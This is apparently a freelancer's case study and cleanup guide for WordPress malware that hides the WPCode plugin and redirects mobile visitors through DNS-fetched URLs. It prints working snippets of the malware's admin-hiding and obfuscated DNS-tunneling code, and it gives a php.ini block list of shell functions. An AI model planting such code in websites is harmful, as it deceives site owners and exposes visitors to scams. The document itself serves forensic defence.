Quick Fix: WPCode Redirect Malware
The Problem: Mobile visitors are being redirected to spam sites, but security plugins (Wordfence, Sucuri) report the site is clean.
The Cause: The malware is NOT in the plugin files. It is injected into the WordPress Database (wp_posts and wp_options) as a hidden “Snippet” inside the WPCode plugin logic.
The Discovery: A manual audit revealed 47 folders in the plugins directory, but only 46 active plugins in the dashboard. The malware was hiding the WPCode plugin from the admin list.
Jump to the Database Cleaning Guide ↓
“I have re-installed WordPress core. I have deleted all my plugins. I have scanned the site ten times. Why is my site STILL redirecting to a lottery scam on my iPhone?”
This is the email I received from a client yesterday. They were desperate. They had done everything “right,” but the redirects persisted.
The reason the scanners failed is simple: The malware wasn’t in the files.
In this case study, I am going to walk you through a specific, nasty infection I call the “Database Ghost.” It targets the popular WPCode plugin (formerly Insert Headers and Footers), hides it from your dashboard, and runs entirely from your database tables.
If your security plugins are giving you a green “All Clear” checkmark but your traffic is tanking, this guide is for you.
Signs of the WPCode “Database Ghost” Infection
The most dangerous malware is the kind you can’t see. This infection is designed to deceive the site owner while exploiting the site’s visitors.
1. Conditional Redirects (The “User-Agent” Trap)
The first thing I noticed when auditing the client’s site was that it worked perfectly on my desktop computer. I clicked every link, refreshed the page—nothing happened.
But when I switched to my iPhone (using 4G, not WiFi), the site instantly redirected to a malicious domain: red.global-reward-sweeps.com.
Why do hackers do this?
- Evasion: Site owners usually edit and check their sites from Desktops. By targeting only mobile devices (Android/iOS), the malware can stay active for months without the owner noticing.
- Difficulty: It is much harder to “Inspect Element” or view source code on a mobile phone, making it harder for non-experts to debug.
2. The “Ghost” Plugin
The client insisted they used the WPCode plugin to manage their Google Analytics tags. However, when I looked at the WordPress Dashboard > Plugins list, WPCode was missing.
They assumed they had accidentally deleted it. But—and here is the key—their Google Analytics tags were still firing on the frontend. The plugin was running, but it was invisible.
3. Why Wordfence & Sucuri Failed
This is the part that frustrates everyone. Security plugins like Wordfence work primarily by File Integrity Scanning. They compare your files (/wp-content/...) against the official WordPress repository.
Since this malware stores its malicious payload in the Database (specifically in wp_posts as a snippet and wp_options as settings), the actual PHP files of the plugin often look legitimate. The scanner sees a “Snippets Plugin” running a snippet—which is exactly what the plugin is designed to do. It assumes the behavior is authorized.
How to Find Hidden Malware in WordPress
Since the automated tools failed, I had to perform a manual forensic audit. This is the exact process I use to find “Ghost” malware.
Step 1: The “Plugin Count” Trick
This is my favorite trick for finding hidden malware.
- I logged into the WordPress Admin Dashboard. Count: 46 Active Plugins.
- I connected to the server via SFTP (FileZilla).
- I navigated to
/wp-content/plugins/and counted the folders. Count: 47 Folders.
The Smoking Gun: The folder insert-headers-and-footers (the slug for WPCode) was physically present on the server, but the WordPress dashboard refused to acknowledge it. Code cannot disappear from the UI unless it is programmed to hide.
Step 2: The Database Deep Dive
Since I suspected the malware was “Living off the Land” (using the database), I opened phpMyAdmin to inspect the raw data.
I ran a search query in the wp_options table for the string auto_update_code. I found an entry containing a massive block of obfuscated PHP code. This was the “Brain” of the malware.
Next, I checked the wp_posts table. WPCode stores your custom snippets as a Custom Post Type. I found a post with post_type = 'wpcode' that contained the redirect script.
Technical Analysis: How the “Database Ghost” Works
Once I extracted the code from the database, I reverse-engineered it to understand its evasion techniques.
1. The “Invisibility Cloak” Logic
The malware injects a filter into your WordPress initialization process. It checks if the current user is an Administrator, and if so, it removes WPCode from the plugin list.
// IF user is Admin AND specific URL parameter is missing
if (current_user_can('administrator') && !array_key_exists('show_all', $_GET)) {
// 1. Hide the menu via CSS
add_action('admin_print_scripts', function () {
echo '<style>#toplevel_page_wpcode { display: none; }</style>';
});
// 2. Unset the plugin from the global array
add_filter('all_plugins', function ($plugins) {
unset($plugins['insert-headers-and-footers/ihaf.php']);
return $plugins;
});
}
The Backdoor: The hacker left a secret key: ?show_all=1. If they visit this URL, the plugin reappears, allowing them to modify the malware settings without needing FTP access.
2. The Firewall Bypass (DNS Tunneling)
This is the most technically impressive part of the infection. Firewalls (WAFs) block malicious HTTP requests. If a script tries to download malware.js from a Russian server, the WAF blocks it.
So, this malware doesn’t use HTTP. It uses DNS Tunneling.
// Build a request using the victim's host and IP
$req = $host . '.' . $ip . '.webdmonitor.io';
// Perform a DNS TXT Lookup
$v = "d" . "ns_" . "get" . "_rec" . "ord"; // Obfuscated "dns_get_record"
$s = @$v($req, DNS_TXT);
It sends a “system check” (DNS Lookup) to a malicious nameserver (webdmonitor.io). The nameserver replies with a TXT record containing the Redirect URL encoded in Base64. Your server decodes it and redirects the user.
Because every server needs DNS to function (to send emails, run updates, etc.), firewalls allow this traffic to pass 100% of the time.
How to Remove “Database Ghost” Malware
Warning: Do not just delete the plugin folder. The malware is in your database. If you reinstall the plugin later, it will read the database and re-infect itself.
Step 1: Manual File Deletion
You cannot delete the plugin from the dashboard because you can’t see it.
- Connect to your site via FTP/SFTP or cPanel File Manager.
- Navigate to
/wp-content/plugins/. - Right-click the
insert-headers-and-footersfolder and Delete it.
Step 2: Clean the wp_options Table
The malware stores its configuration in the options table. You need to access your database via phpMyAdmin.
Run the following SQL query to find the malicious entries:
SELECT * FROM wp_options
WHERE option_name IN ('_pwsa', 'd', 'auto_update_code', 'wpcode_global_error');
Action: Delete any rows that are returned.
Step 3: Clean the wp_posts Table
This is where the “Snippet” lives. The malware saves itself as a custom code snippet so WPCode executes it automatically.
Run this query:
SELECT * FROM wp_posts
WHERE post_type = 'wpcode'
AND post_content LIKE '%dns_get_record%';
Action: Delete any posts found. Also, look for any suspicious snippets you didn’t create.
Step 4: Flush Transients & Object Cache
The malware is smart. It caches the redirect URL in a “Transient” (temporary database cache) for 24 hours. Even if you delete the plugin and clean the database, the redirect URL might still be sitting in your site’s memory.
Run this query to kill the cache:
DELETE FROM wp_options WHERE option_name LIKE '_transient_exp%';
Finally, clear your Redis/Memcached and Cloudflare/CDN caches.
How to Prevent Future Database Infections
Now that the “Ghost” is gone, how do you stop it from coming back?
1. Disable dns_get_record
Unless you are running a specific network diagnostic tool, your WordPress site never needs to perform raw DNS lookups. This function is almost exclusively used by hackers for tunneling.
Add this to your php.ini file:
disable_functions = dns_get_record, exec, passthru, shell_exec, system
2. Least Privilege Principles
This malware successfully created a hidden Admin user because the database user had full permissions. Ensure your database user only has permissions for the specific database it needs, and consider using a File Integrity Monitor that runs Server-Side (like cPanel’s built-in scanner) rather than just a plugin.
FAQ: WPCode & Database Malware
Is the WPCode plugin unsafe to use?
No. WPCode is a legitimate, well-coded plugin. The issue is not a vulnerability in the plugin, but rather that hackers are “infecting” it. Because the plugin is designed to run custom code (like Analytics), hackers love it because they can hide their malware inside it, and security scanners assume the code is legitimate.
Can I just reinstall the plugin to fix it?
No. This is the biggest mistake people make. If you delete the files and reinstall the plugin, the fresh plugin will read the old wp_options and wp_posts tables from your database. The malware will instantly re-inject itself into the new files. You MUST clean the database first.
How did the malware get into the database?
Typically, the entry point is a compromised Administrator account or a vulnerability in a different plugin. Once the hacker gets in, they inject the code into the database and hide the traces. This ensures that even if you update your plugins, the malware survives.
Still dealing with redirects? Database malware is high-risk. One wrong SQL command can break your site. If you are uncomfortable editing database tables, hire me for a professional malware removal service. I specialize in forensic database cleaning that automated tools can’t handle.
Top comments (0)